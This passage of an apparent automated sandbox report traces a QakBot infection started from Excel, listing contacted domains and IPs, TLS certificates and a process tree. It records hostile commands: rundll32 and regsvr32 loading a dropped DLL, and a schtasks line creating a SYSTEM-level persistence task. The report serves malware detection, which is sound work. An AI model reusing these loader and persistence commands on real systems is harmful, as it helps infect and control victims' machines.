                                                                                                                                                          May 12, 2021 13:34:30.249735117 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:30.373637915 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:31.074817896 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:31.133188963 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:31.924369097 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:31.984452963 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:32.433563948 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:32.493552923 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:33.583031893 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:33.640203953 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:33.918680906 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:33.990600109 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:34.687747955 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:34.736524105 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:35.269757986 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:35.337656021 CEST53575258.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:47.825035095 CEST5381453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:47.883009911 CEST53538148.8.8.8192.168.2.4

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          May 12, 2021 13:32:31.023514032 CEST192.168.2.48.8.8.80xe7e0Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                          May 12, 2021 13:32:32.547735929 CEST192.168.2.48.8.8.80xf80cStandard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          May 12, 2021 13:32:31.072433949 CEST8.8.8.8192.168.2.40xe7e0No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                          May 12, 2021 13:32:32.610028028 CEST8.8.8.8192.168.2.40xf80cNo error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)
                                                                                                                                                          May 12, 2021 13:34:15.245922089 CEST8.8.8.8192.168.2.40x13c3No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                          HTTPS Packets

                                                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                          May 12, 2021 13:32:31.429538965 CEST192.185.39.58443192.168.2.449729CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          May 12, 2021 13:32:32.934375048 CEST192.185.32.232443192.168.2.449734CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          Analysis Process: EXCEL.EXE PID: 6780 Parent PID: 800

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:23
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0xf30000
                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: rundll32.exe PID: 7104 Parent PID: 6780

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:32
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                          Imagebase:0x10f0000
                                                                                                                                                          File size:61952 bytes
                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: QakBot, Description: QakBot Payload, Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: explorer.exe PID: 6480 Parent PID: 7104

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:51
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          Imagebase:0x1080000
                                                                                                                                                          File size:3611360 bytes
                                                                                                                                                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: QakBot, Description: QakBot Payload, Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: rundll32.exe PID: 5668 Parent PID: 6780

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:51
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                          Imagebase:0x10f0000
                                                                                                                                                          File size:61952 bytes
                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: schtasks.exe PID: 6500 Parent PID: 6480

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:51
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
                                                                                                                                                          Imagebase:0xb40000
                                                                                                                                                          File size:185856 bytes
                                                                                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: conhost.exe PID: 6512 Parent PID: 6500

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:52
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff724c50000
                                                                                                                                                          File size:625664 bytes
                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: regsvr32.exe PID: 4816 Parent PID: 968

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:54
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x7ff7585d0000
                                                                                                                                                          File size:24064 bytes
                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: regsvr32.exe PID: 5132 Parent PID: 4816

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:55
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline: -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x1200000
                                                                                                                                                          File size:20992 bytes
                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: WerFault.exe PID: 3912 Parent PID: 5132

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:57
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
                                                                                                                                                          Imagebase:0xfc0000
                                                                                                                                                          File size:434592 bytes
                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: regsvr32.exe PID: 984 Parent PID: 968

                                                                                                                                                          General

                                                                                                                                                          Start time:13:34:00
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x7ff7585d0000
                                                                                                                                                          File size:24064 bytes
                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: regsvr32.exe PID: 4780 Parent PID: 984

                                                                                                                                                          General

                                                                                                                                                          Start time:13:34:01
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline: -s 'C:\Users\user\ritofm.cvm'
                                                                                                                                                          Imagebase:0x1200000
                                                                                                                                                          File size:20992 bytes
                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Analysis Process: WerFault.exe PID: 5828 Parent PID: 4780

                                                                                                                                                          General

                                                                                                                                                          Start time:13:34:03
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652
                                                                                                                                                          Imagebase:0xfc0000
                                                                                                                                                          File size:434592 bytes
                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >